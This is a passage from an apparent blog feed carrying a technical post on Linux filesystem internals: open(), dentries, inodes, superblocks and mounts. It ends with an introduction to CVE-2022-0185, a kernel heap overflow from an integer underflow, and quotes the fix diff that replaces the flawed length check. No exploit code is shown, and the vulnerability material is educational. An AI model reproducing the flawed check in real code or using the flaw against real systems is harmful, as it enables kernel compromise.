</code></pre></div></div>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In Filesystem 101, we covered the structural relationships of the Linux filesystem from a process perspective. In this post, we continue analyzing how it interacts with other kernel subsystems.]]></summary></entry><entry><title type="html">Filesystem 101</title><link href="https://u1f383.github.io/linux/2026/02/26/filesystem-101.html" rel="alternate" type="text/html" title="Filesystem 101" /><published>2026-02-26T00:00:00+00:00</published><updated>2026-02-26T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/02/26/filesystem-101</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/02/26/filesystem-101.html"><![CDATA[<p>Recently I explored the filesystem design of Linux and found it is little more complicated than I expected, so I decided to write a post organizing it. This post analyzes the filesystem from a high-level view, skipping detailed implementation. I hope that after reading it, you will understand more about the Linux filesystem.</p>

<h1 id="1-overview">1. Overview</h1>

<h2 id="11-file-dentry-and-inode">1.1. file, dentry and inode</h2>

<p>First, we start with how the simple syscall <code class="language-plaintext highlighter-rouge">open</code> works to figure out the filesystem internal.</p>

<p>When you call the <code class="language-plaintext highlighter-rouge">open</code> system call, <code class="language-plaintext highlighter-rouge">__do_sys_open()</code> is the entry point in kernel space. In <code class="language-plaintext highlighter-rouge">do_sys_openat2()</code>, the kernel gets a file descriptor, opens the file, and installs it into process’s file table.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_open(filename, flags, mode)
=&gt; do_sys_open(AT_FDCWD, filename, flags, mode)
  =&gt; do_sys_openat2(dfd, filename, &amp;how)
    =&gt; fd = get_unused_fd_flags(how-&gt;flags)
    =&gt; f = do_filp_open(dfd, tmp, &amp;op)
    =&gt; fd_install(fd, f)
</code></pre></div></div>

<p>In <code class="language-plaintext highlighter-rouge">path_openat()</code>, the kernel allocates an empty <code class="language-plaintext highlighter-rouge">file</code> object, then resolves the pathname, and finally binds the name data (<code class="language-plaintext highlighter-rouge">nd</code>) to that <code class="language-plaintext highlighter-rouge">file</code> object by calling <code class="language-plaintext highlighter-rouge">do_open()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_filp_open(dfd, pathname, op)
=&gt; set_nameidata(&amp;nd, dfd, pathname, NULL)
=&gt; path_openat(&amp;nd, op, flags | LOOKUP_RCU)
  =&gt; file = alloc_empty_file(op-&gt;open_flag, current_cred())
  
  // ========= resolution =========
  =&gt; s = path_init(nd, flags)
  =&gt; link_path_walk(s, nd)
  =&gt; s = open_last_lookups(nd, file, op)
  
  =&gt; do_open(nd, file, op)
</code></pre></div></div>

<p>The whole process raises three questions:</p>
<ol>
  <li>How does the file table work?</li>
  <li>How does the kernel resolve pathname?</li>
  <li>How does the binding work?</li>
</ol>

<p><br /></p>

<p>The first question, <strong>“how the file table works?”</strong>, is the easiest.</p>

<p>The purpose of the file descriptor is to let a process use a number to represent a <code class="language-plaintext highlighter-rouge">file</code> object. This implies there is an array-like structure that maintains the mapping between the number and the <code class="language-plaintext highlighter-rouge">file</code> object, and that is exactly what <strong>file table</strong> does.</p>

<p>When calling <code class="language-plaintext highlighter-rouge">get_unused_fd_flags()</code>, the kernel gets the file table from the <strong>current process</strong> (<code class="language-plaintext highlighter-rouge">current-&gt;files</code>). It then finds an unused number and marks it as in use.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>get_unused_fd_flags(flags)
=&gt; __get_unused_fd_flags(flags, rlimit(RLIMIT_NOFILE))
  =&gt; alloc_fd(0, nofile, flags)
    =&gt; files = current-&gt;files
    =&gt; fdt = files_fdtable(files)
    =&gt; fd = find_next_fd(fdt, fd)
    =&gt; __set_open_fd(fd, fdt, flags &amp; O_CLOEXEC)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">fd_install()</code> is quite simple. It assigns the <code class="language-plaintext highlighter-rouge">file</code> object to the file table’s fd array <code class="language-plaintext highlighter-rouge">fdt-&gt;fd[]</code>, using the pre-reserved <code class="language-plaintext highlighter-rouge">fd</code> as the index.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fd_install(fd, file)
=&gt; files = current-&gt;files
=&gt; fdt = files_fdtable(files)
=&gt; rcu_assign_pointer(fdt-&gt;fd[fd], file)
</code></pre></div></div>

<p>The next time we call any syscall that requires file operations, we just pass the file descriptor to the kernel. Then <code class="language-plaintext highlighter-rouge">fdget()</code> or similar functions are used to retrieve the corresponding <code class="language-plaintext highlighter-rouge">file</code> object.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fdget(fd)
=&gt; __fget_light(fd, FMODE_PATH)
  =&gt; files = current-&gt;files
  =&gt; file = files_lookup_fd_raw(files, fd)
    =&gt; rcu_dereference_raw(fdt-&gt;fd[fd&amp;mask])
  =&gt; return BORROWED_FD(file)
</code></pre></div></div>

<p><br /></p>

<p>The next question is <strong>“how the kernel resolves pathname?”</strong></p>

<p>There are three steps: setting up resolution environment, resolving the directory and resolving the final file. These steps correspond to three different function calls, which we saw in the <code class="language-plaintext highlighter-rouge">path_openat()</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">path_init()</code> is called first to set up the resolution environment. Basically, it decides the <strong>starting director</strong>y, since the <code class="language-plaintext highlighter-rouge">open</code> syscall allows a process to resolve a pathname from a specified directory.</p>

<p>If the pathname starts with <code class="language-plaintext highlighter-rouge">"/"</code>, the kernel sets the starting directory to <strong>root directory</strong>. Otherwise, the kernel checks <strong>directory file descriptor</strong> (<code class="language-plaintext highlighter-rouge">dfd</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>path_init(nd, flags)
=&gt; s = nd-&gt;pathname
=&gt; if (*s == '/' &amp;&amp; ...)
  =&gt; nd_jump_root(nd)
    =&gt; set_root(nd)
      =&gt; fs = current-&gt;fs
      =&gt; nd-&gt;root = fs-&gt;root
    =&gt; nd-&gt;path = nd-&gt;root
    =&gt; nd-&gt;inode = nd-&gt;path.dentr-&gt;d_inode

=&gt; if (nd-&gt;dfd == AT_FDCWD)
  =&gt; fs = current-&gt;fs
  =&gt; nd-&gt;path = fs-&gt;pwd
  =&gt; nd-&gt;inode = nd-&gt;path.dentry-&gt;d_inode

=&gt; else
  =&gt; f = fdget_raw(nd-&gt;dfd)
  =&gt; nd-&gt;path = fd_file(f)-&gt;f_path
  =&gt; nd-&gt;inode = nd-&gt;path.dentry-&gt;d_inode
</code></pre></div></div>

<p>You might already notice the similarity. Although the operations differ, the goal is same: set <strong><code class="language-plaintext highlighter-rouge">nd-&gt;path</code></strong> and <strong><code class="language-plaintext highlighter-rouge">nd-&gt;inode</code></strong>. Moreover, if you look more carefully, you may notice that <code class="language-plaintext highlighter-rouge">nd-&gt;inode</code> actually comes from a field inside <code class="language-plaintext highlighter-rouge">nd-&gt;path</code>. The <code class="language-plaintext highlighter-rouge">nd-&gt;path</code> is a <code class="language-plaintext highlighter-rouge">path</code> object consisting of <code class="language-plaintext highlighter-rouge">mnt</code> and <code class="language-plaintext highlighter-rouge">dentry</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">path</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">vfsmount</span> <span class="o">*</span><span class="n">mnt</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">dentry</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>With <code class="language-plaintext highlighter-rouge">nd-&gt;path</code> set to the starting directory, we move to next step to resolve the <strong>directory part</strong> of the pathname.</p>

<p>Generally, <code class="language-plaintext highlighter-rouge">link_path_walk()</code> seperates the whole pathname info components <strong>using one or more <code class="language-plaintext highlighter-rouge">"/"</code> as delimiter</strong> and resolves them one at a time. For example, the pathname <code class="language-plaintext highlighter-rouge">"a/b///c/d"</code> will be seperated into <code class="language-plaintext highlighter-rouge">"a"</code>, <code class="language-plaintext highlighter-rouge">"b"</code>, <code class="language-plaintext highlighter-rouge">"c"</code> and <code class="language-plaintext highlighter-rouge">"d"</code>.</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">__d_lookup_rcu()</code> finds the corresponding <strong><code class="language-plaintext highlighter-rouge">dentry</code></strong> object for the current component based on the current directory (<code class="language-plaintext highlighter-rouge">parent</code>) and name string (<code class="language-plaintext highlighter-rouge">&amp;nd-&gt;last</code>). Interestingly, all <code class="language-plaintext highlighter-rouge">dentry</code> objects are stored in bucket lists that can be referenced from a <strong>global</strong> hash table (<code class="language-plaintext highlighter-rouge">dentry_hashtable</code>).</p>

<p>After successfully obtaining the <code class="language-plaintext highlighter-rouge">dentry</code> object, <code class="language-plaintext highlighter-rouge">step_into()</code> is called to <strong>update the current directory to the found <code class="language-plaintext highlighter-rouge">dentry</code> object</strong>. This function also handles the symlink resolution, but we will not discuss it further here.</p>

<p>The entire process may repeat several times until it reaches the final component.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>link_path_walk(name, nd)
=&gt; for each components
  =&gt; nd-&gt;last.name = name
  =&gt; link = walk_component(nd, WALK_MORE)
    
    =&gt; dentry = lookup_fast(nd)
      =&gt; parent = nd-&gt;path.dentry
      =&gt; dentry = __d_lookup_rcu(parent, &amp;nd-&gt;last, &amp;nd-&gt;next_seq)
        =&gt; b = d_hash(hashlen)
          =&gt; dentry_hashtable + hash value
    
    =&gt; step_into(nd, flags, dentry)
      =&gt; handle_mounts(nd, dentry, &amp;path)
        =&gt; path-&gt;mnt = nd-&gt;path.mnt
        =&gt; path-&gt;dentry = dentry
      =&gt; nd-&gt;path = path
      =&gt; nd-&gt;inode = path.dentry-&gt;d_inode
</code></pre></div></div>

<p>Finally, <code class="language-plaintext highlighter-rouge">open_last_lookups()</code> is called to <strong>resolve the final component</strong> (the file itself). This function is basically the same as <code class="language-plaintext highlighter-rouge">walk_component()</code> if the file already exists. However, the main difference is that <code class="language-plaintext highlighter-rouge">walk_component()</code> returns an error if <code class="language-plaintext highlighter-rouge">dentry</code> doesn’t exist, while <code class="language-plaintext highlighter-rouge">open_last_lookups()</code> <strong>creates a new <code class="language-plaintext highlighter-rouge">dentry</code> by <code class="language-plaintext highlighter-rouge">__d_alloc()</code></strong>.</p>

<p>This kind of <code class="language-plaintext highlighter-rouge">dentry</code> is called a <strong>negative dentry</strong>, meaning the <code class="language-plaintext highlighter-rouge">dentry</code> has no associated <code class="language-plaintext highlighter-rouge">inode</code> (i.e., no actual file on disk), but it still exists in the dcache and can be accessed. It is required because a process is able to pass <code class="language-plaintext highlighter-rouge">O_CREAT</code> option to create a new file if it doesn’t exist.</p>

<p>Later, the kernel calls the inode operations <code class="language-plaintext highlighter-rouge">.create</code> to create a <strong><code class="language-plaintext highlighter-rouge">inode</code></strong> and bind it to that <code class="language-plaintext highlighter-rouge">dentry</code>. How the kernel creates the <code class="language-plaintext highlighter-rouge">inode</code> depends on the filesystem. For instance, the shmem filesystem calls <code class="language-plaintext highlighter-rouge">shmem_get_inode()</code> to allocate a shmem inode.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>open_last_lookups(nd, file, op)
=&gt; dentry = lookup_fast_for_open(nd, open_flag)
  =&gt; dentry = lookup_fast(nd)
  =&gt; return dentry

=&gt; if not found
  =&gt; dentry = lookup_open(nd, file, op, got_write)
    =&gt; dentry = d_lookup(dir, &amp;nd-&gt;last)
    =&gt; dentry = d_alloc_parallel(dir, &amp;nd-&gt;last, &amp;wq)
      =&gt; new = __d_alloc(parent-&gt;d_sb, name)
        =&gt; dentry = kmem_cache_alloc_lru(dentry_cache)
        =&gt; dentry-&gt;d_op = sb-&gt;__s_d_op
      =&gt; return new
    
    =&gt; dir_inode-&gt;i_op-&gt;create(idmap, dir_inode, dentry)
      =&gt; inode = ...
      =&gt; d_instantiate(dentry, inode)
        =&gt; __d_set_inode_and_type(dentry, inode, add_flags)
          =&gt; dentry-&gt;d_inode = inode

=&gt; step_into(nd, WALK_TRAILING, dentry)
</code></pre></div></div>

<p>By now, we know that the pathname resolution is typically a <code class="language-plaintext highlighter-rouge">dentry</code> object lookup. It starts by setting the starting directory, seperating pathname into multiple components, and then retrieving the corresponding <code class="language-plaintext highlighter-rouge">dentry</code> from the hash bucket list.</p>

<p><br /></p>

<p>The last question, <strong>“How does the binding work?”</strong>, is related to how a file accesses the metadata such as permissions. Internally, <code class="language-plaintext highlighter-rouge">vfs_open()</code> stores path information for future lookups (<code class="language-plaintext highlighter-rouge">file-&gt;__f_path</code>), and <code class="language-plaintext highlighter-rouge">do_dentry_open()</code> is called to store the <code class="language-plaintext highlighter-rouge">inode</code> and invokes filesystem’s open handler (<code class="language-plaintext highlighter-rouge">f-&gt;f_op-&gt;open</code>). That’s how the <code class="language-plaintext highlighter-rouge">file</code> object is associated with the <code class="language-plaintext highlighter-rouge">dentry</code> and the <code class="language-plaintext highlighter-rouge">inode</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_open(nd, file, op)
=&gt; vfs_open(&amp;nd-&gt;path, file)
  =&gt; file-&gt;__f_path = *path
  =&gt; do_dentry_open(file, NULL)
    =&gt; inode = f-&gt;f_path.dentry-&gt;d_inode
    =&gt; f-&gt;f_inode = inode
    =&gt; f-&gt;f_op = fops_get(inode-&gt;i_fop)
    =&gt; f-&gt;f_op-&gt;open(inode, f)
</code></pre></div></div>

<p>In short, the architecture of the relationships among the file desciptor, <code class="language-plaintext highlighter-rouge">file</code>, <code class="language-plaintext highlighter-rouge">dentry</code>, <code class="language-plaintext highlighter-rouge">path</code> and <code class="language-plaintext highlighter-rouge">inode</code> is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    [fdtable]         (__f_path)
fd --&gt; [0] -&gt; file A ------------&gt; path
                   |                |-- mnt
         (f_inode) |                |-- dentry --
                   |                             |
                    ------&gt; inode &lt;--------------
                                     (d_inode)
       [1] -&gt; file B
       [X] -&gt; ......
</code></pre></div></div>

<p>They each have different roles: a <strong>file descriptor</strong> is a number used to index file table; a <strong><code class="language-plaintext highlighter-rouge">file</code></strong> encapsulates regular files and sockets under the same interfaces for a clean and simple design; a <strong><code class="language-plaintext highlighter-rouge">path</code></strong> is used for lookup, containing mount object (<code class="language-plaintext highlighter-rouge">mnt</code>) and the <code class="language-plaintext highlighter-rouge">dentry</code>; a <strong><code class="language-plaintext highlighter-rouge">dentry</code></strong> contains pathname information for file lookup; an <strong><code class="language-plaintext highlighter-rouge">inode</code></strong> contains the file’s metadata, including the owner, permissions, and file mapping information.</p>

<h2 id="12-fs_context-super_block-and-vfsmount">1.2. fs_context, super_block and vfsmount</h2>

<p>After introducing the concepts of <code class="language-plaintext highlighter-rouge">inode</code> and <code class="language-plaintext highlighter-rouge">dentry</code>, we may wonder <strong>where the <code class="language-plaintext highlighter-rouge">inode</code> comes from</strong> and <strong>how the mounting operation intializes <code class="language-plaintext highlighter-rouge">mnt</code> and builds the <code class="language-plaintext highlighter-rouge">inode</code> tree</strong>. In this section, we will explore these questions and find the answers.</p>

<p>Looking at the syscall <code class="language-plaintext highlighter-rouge">mount</code>, <code class="language-plaintext highlighter-rouge">do_new_mount()</code> calls <code class="language-plaintext highlighter-rouge">get_fs_type()</code> to find the <code class="language-plaintext highlighter-rouge">file_system_type</code> object with the matching name. The object contains metadata for creating a filesystem instance, and different filesystems may have their own implementations.</p>

<p><code class="language-plaintext highlighter-rouge">file_system_type</code> object is later used to initialize a filesystem context (<code class="language-plaintext highlighter-rouge">fc</code>) object by invoking its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler. A filesystem context represents an <strong>in-progress mount operation</strong> and stores configuration before the superblock is created. The <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler typically allocates and initializes <strong>filesystem-specific private data</strong> and sets up the <strong>context operations (<code class="language-plaintext highlighter-rouge">fc-&gt;ops</code>)</strong>.</p>

<p>After that, <code class="language-plaintext highlighter-rouge">parse_monolithic_mount_data()</code> is called to <strong>parse the mount parameters</strong>. For example, if you run the <code class="language-plaintext highlighter-rouge">mount</code> command with the options <code class="language-plaintext highlighter-rouge">-o ro,noexec</code>, the string <code class="language-plaintext highlighter-rouge">"ro,noexec"</code> will be parsed and used to update the filesystem context.</p>

<p>Finally, <code class="language-plaintext highlighter-rouge">do_new_mount_fc()</code> is called to set up the superblock and mount point.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_mount(dev_name, dir_name, type, flags, data)
=&gt; do_mount(kernel_dev, dir_name, kernel_type, flags, options)
  =&gt; user_path_at(AT_FDCWD, dir_name, LOOKUP_FOLLOW, &amp;path)
  =&gt; path_mount(dev_name, &amp;path, type_page, flags, data_page)
    =&gt; do_new_mount(path, type_page, sb_flags, mnt_flags, dev_name, data_page)
      =&gt; type = get_fs_type(fstype)
        =&gt; fs = __get_fs_type(name, len)
        =&gt; return fs
      
      =&gt; fc = fs_context_for_mount(type, sb_flags)
        =&gt; alloc_fs_context(fs_type, NULL, sb_flags, 0, FS_CONTEXT_FOR_MOUNT)
          =&gt; fc = kzalloc(sizeof(struct fs_context))
          =&gt; fc-&gt;fs_type-&gt;init_fs_context(fc)

      =&gt; parse_monolithic_mount_data(fc, data)
        =&gt; if (fc-&gt;ops-&gt;parse_monolithic != NULL)
          =&gt; fc-&gt;ops-&gt;parse_monolithic(fc, data)
        =&gt; else
          =&gt; generic_parse_monolithic(fc, data)
      
      =&gt; do_new_mount_fc(fc, path, mnt_flags)
</code></pre></div></div>

<p>Internally, the kernel calls filesystem’s <code class="language-plaintext highlighter-rouge">.get_tree</code> handler to build the <strong>file tree</strong>. For filesystems that <strong>require a backing image</strong>, such as ext4, the handler initializes the superblock and sets up the root <code class="language-plaintext highlighter-rouge">inode</code> and root <code class="language-plaintext highlighter-rouge">dentry</code> based on on-disk metadata. Other <code class="language-plaintext highlighter-rouge">inode</code>s and <code class="language-plaintext highlighter-rouge">dentry</code>s are <strong>loaded on demand</strong> during path lookup rather than being created eagerly at mount time.</p>

<p>In contrast, for filesystems that <strong>do not require a backing image</strong>, such as ramfs, the handler typically allocates a new superblock and creates only the root <code class="language-plaintext highlighter-rouge">inode</code> and <code class="language-plaintext highlighter-rouge">dentry</code> for the mount point.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_new_mount_fc(fc, mountpoint, mnt_flags)
=&gt; mnt = fc_mount(fc)
  =&gt; vfs_get_tree(fc)
    =&gt; fc-&gt;ops-&gt;get_tree(fc)
  =&gt; vfs_create_mount(fc)
</code></pre></div></div>
<p>Let’s take ramfs as an example. Its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> sets the context operations to <code class="language-plaintext highlighter-rouge">&amp;ramfs_context_ops</code>, whose <code class="language-plaintext highlighter-rouge">.get_tree</code> handler is <code class="language-plaintext highlighter-rouge">ramfs_get_tree()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">ramfs_init_fs_context</span><span class="p">(</span><span class="k">struct</span> <span class="n">fs_context</span> <span class="o">*</span><span class="n">fc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">fc</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">ramfs_context_ops</span><span class="p">;</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">fs_context_operations</span> <span class="n">ramfs_context_ops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">free</span>        <span class="o">=</span> <span class="n">ramfs_free_fc</span><span class="p">,</span>
    <span class="p">.</span><span class="n">parse_param</span> <span class="o">=</span> <span class="n">ramfs_parse_param</span><span class="p">,</span>
    <span class="p">.</span><span class="n">get_tree</span>    <span class="o">=</span> <span class="n">ramfs_get_tree</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Almost all filesystems follow a pattern for their <code class="language-plaintext highlighter-rouge">.get_tree</code> handler. They commonly call <code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> or related functions, passing a filesystem-specific <code class="language-plaintext highlighter-rouge">fill_super</code> callback.</p>

<p><code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> internally obtains or creates a superblock and then invokes the provided callback to intialize it. In the case of ramfs, its <code class="language-plaintext highlighter-rouge">.get_tree</code> handler calls <code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> with <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">ramfs_get_tree</span><span class="p">(</span><span class="k">struct</span> <span class="n">fs_context</span> <span class="o">*</span><span class="n">fc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">get_tree_nodev</span><span class="p">(</span><span class="n">fc</span><span class="p">,</span> <span class="n">ramfs_fill_super</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If a new superblock is needed, <code class="language-plaintext highlighter-rouge">alloc_super()</code> is called to allocate a <code class="language-plaintext highlighter-rouge">super_block</code> object, and the newly created <code class="language-plaintext highlighter-rouge">super_block</code> object is then inserted into the <code class="language-plaintext highlighter-rouge">file_system_type</code>’s superblock linked list (<code class="language-plaintext highlighter-rouge">s-&gt;s_type-&gt;fs_supers</code>) by <code class="language-plaintext highlighter-rouge">sget_fc()</code>. After that, the <code class="language-plaintext highlighter-rouge">fill_super</code> callback (in this case, <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>) is invoked to initialize that <code class="language-plaintext highlighter-rouge">super_block</code> object.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>get_tree_nodev(fc, ramfs_fill_super)
=&gt; vfs_get_super(fc, NULL, fill_super)
  =&gt; sb = sget_fc(fc, test, set_anon_super_fc)
    =&gt; s = alloc_super(fc-&gt;fs_type, fc-&gt;sb_flags, user_ns)
    =&gt; hlist_add_head(&amp;s-&gt;s_instances, &amp;s-&gt;s_type-&gt;fs_supers)
  
  =&gt; fill_super(sb, fc)

=&gt; fc-&gt;root = dget(sb-&gt;s_root)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">fill_super</code> callback must initialize the root <code class="language-plaintext highlighter-rouge">inode</code> and the root <code class="language-plaintext highlighter-rouge">dentry</code>, since the root <code class="language-plaintext highlighter-rouge">inode</code> contains the <strong>inode operations (<code class="language-plaintext highlighter-rouge">i_op</code>)</strong> and <strong>file operations (<code class="language-plaintext highlighter-rouge">i_fop</code>)</strong> required for directory lookup and file access.</p>

<p>In <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>, <code class="language-plaintext highlighter-rouge">ramfs_get_inode()</code> is called to allocate and initialize the root <code class="language-plaintext highlighter-rouge">inode</code>. Then <code class="language-plaintext highlighter-rouge">d_make_root()</code> creates a <code class="language-plaintext highlighter-rouge">dentry</code> associated with that <code class="language-plaintext highlighter-rouge">inode</code>, and the returned <code class="language-plaintext highlighter-rouge">dentry</code> is assigned to the superblock’s root (<code class="language-plaintext highlighter-rouge">sb-&gt;s_root</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fill_super(sb, fc)   # ramfs_fill_super
=&gt; sb-&gt;s_op = &amp;ramfs_ops
=&gt; inode = ramfs_get_inode(sb, NULL, S_IFDIR | ..., 0)
  =&gt; inode = new_inode(sb)
    =&gt; alloc_inode(sb)
      =&gt; if sb-&gt;s_op-&gt;alloc_inode != NULL
        =&gt; inode = sb-&gt;s_op-&gt;alloc_inode(sb)
      =&gt; else
        =&gt; inode = alloc_inode_sb(sb)
  
  =&gt; if (mode == S_IFDIR)
    =&gt; inode-&gt;i_op = &amp;ramfs_dir_inode_operations
    =&gt; inode-&gt;i_fop = &amp;simple_dir_operations

=&gt; sb-&gt;s_root = d_make_root(inode)
</code></pre></div></div>

<p>At the end of the mounting process, <code class="language-plaintext highlighter-rouge">vfs_create_mount()</code> creates a <code class="language-plaintext highlighter-rouge">mount</code> object and associate it with the superblock by setting <code class="language-plaintext highlighter-rouge">m-&gt;mnt.mnt_sb</code> to point to the superblock (<code class="language-plaintext highlighter-rouge">root-&gt;d_sb</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vfs_create_mount(fc)
=&gt; mnt = alloc_vfsmnt(fc-&gt;source)
  =&gt; mnt = kmem_cache_zalloc(mnt_cache)

=&gt; setup_mnt(mnt, fc-&gt;root)
  =&gt; m-&gt;mnt.mnt_sb = root-&gt;d_sb
  =&gt; m-&gt;mnt.mnt_root = dget(root)
  =&gt; mnt_add_instance(m, s)
    =&gt; s-&gt;s_mounts = m

=&gt; return &amp;mnt-&gt;mnt
</code></pre></div></div>

<p>Since the filesystem context (<code class="language-plaintext highlighter-rouge">fs_context</code>) is only used during the mount setup phrase, it is <strong>released</strong> before returning to userspace and is not referenced by any persistent VFS object.</p>

<p><br /></p>

<p>In summary, the filesystem name is used to look up the corresponding <strong><code class="language-plaintext highlighter-rouge">file_system_type</code></strong>, and its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler is invoked to initialize a <strong>filesystem context</strong> (<code class="language-plaintext highlighter-rouge">fs_context</code>). Later, the kernel calls the filesystem’s <code class="language-plaintext highlighter-rouge">.get_tree</code> handler to to build a file tree. Internally, a <strong><code class="language-plaintext highlighter-rouge">super_block</code></strong> object and a <strong><code class="language-plaintext highlighter-rouge">mount</code></strong> object are created, and the <strong>root <code class="language-plaintext highlighter-rouge">inode</code></strong> and the <strong>root <code class="language-plaintext highlighter-rouge">dentry</code></strong> are intialized by the filesystem’s <code class="language-plaintext highlighter-rouge">fill_super</code> callback.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>             [lookup]
name ("ramfs") ---&gt; file_system_type list ("bdev" &lt;--&gt; "aio" &lt;--&gt; "anon_inodefs" ...)
                          |
                          | [found]
                          v
                     ramfs_fs_type (.name == "ramfs")
                          |
                          | (fs_supers)
           (s_root)       |
dentry   &lt;---------  super_block --&gt; super_block --&gt; super_block --&gt; ...
|        &lt;--              |
|           |             | (s_mounts)
|(d_inode)  |             |
|            ---------  mount --&gt; mount --&gt; mount --&gt; ...
|          (mnt_root)           
v
inode
</code></pre></div></div>

<p>Awesome! Now we understand how a simple file descriptor can reference the actual file content and interact with the filesystem.</p>

<p>You may wonder why mount points and superblocks do not have a one-to-one relationship in the diagram. This is because when the mount flags include <code class="language-plaintext highlighter-rouge">MS_BIND</code>, the kernel invokes <code class="language-plaintext highlighter-rouge">__do_loopback()</code> instead of <code class="language-plaintext highlighter-rouge">do_new_mount()</code>. In this case, the process requests a new mount point based on an existing one. As a result, the kernel allocates a new <code class="language-plaintext highlighter-rouge">mount</code> object for the target path, but it <strong>shares the same underlying superblock as the original mount</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>path_mount(dev_name, path, type_page, flags, data_page)
=&gt; do_loopback(path, dev_name, flags &amp; MS_REC)
  =&gt; kern_path(old_name, LOOKUP_FOLLOW|LOOKUP_AUTOMOUNT, &amp;old_path)
  =&gt; __do_loopback(&amp;old_path, recurse)
    =&gt; clone_mnt(old, old_path-&gt;dentry, 0)
      =&gt; mnt = alloc_vfsmnt(old-&gt;mnt_devname)
      =&gt; setup_mnt(mnt, root)   &lt;-----   attach to existing superblock
</code></pre></div></div>

<h1 id="2-past-vulnerabilites">2. Past Vulnerabilites</h1>

<p>Here I chose two vulnerabilities that were exploited in kernelCTF in recent years to illustrate security issues in the filesystem.</p>

<h2 id="21-cve-2022-0185-vfs-fs_context-fix-up-param-length-parsing-in-legacy_parse_param">2.1. CVE-2022-0185: vfs: fs_context: fix up param length parsing in legacy_parse_param</h2>
<blockquote>
  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=722d94847de29310e8aa03fcbdb41fc92c521756</p>
</blockquote>

<p>This is an integer underflow vulnerability in <code class="language-plaintext highlighter-rouge">legacy_parse_param()</code>, a function used to parse mount parameter for legacy filesystems. The vulnerability leads to a length check bypass, which is ultimately turned into a heap overflow.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -548,7 +548,7 @@</span> static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
                   param-&gt;key);
     }
 
<span class="gd">-   if (len &gt; PAGE_SIZE - 2 - size)
</span><span class="gi">+   if (size + len + 2 &gt; PAGE_SIZE)
</span>        return invalf(fc, "VFS: Legacy: Cumulative options too large");
    if (strchr(param-&gt;key, ',') ||
        (param-&gt;type == fs_value_is_string &amp;&amp;
</code></pre></div></div>

<p>We’ve mentioned that the mount parameters are parsed by <code class="language-plaintext highlighter-rouge">parse_monolithic_mount_data()</code>. In fact, to support more flexible configuration, Linux later introduced three new syscalls: <strong><code class="language-plaintext highlighter-rouge">fsopen</code>, <code class="language-plaintext highlighter-rouge">fsconfig</code> and <code class="language-plaintext highlighter-rouge">fsmount</code></strong>. They roughly correspond to the main steps of mounting: creating a filesystem context (selecting the filesystem type), configuring mount options, and finally creating a mount object.</p>

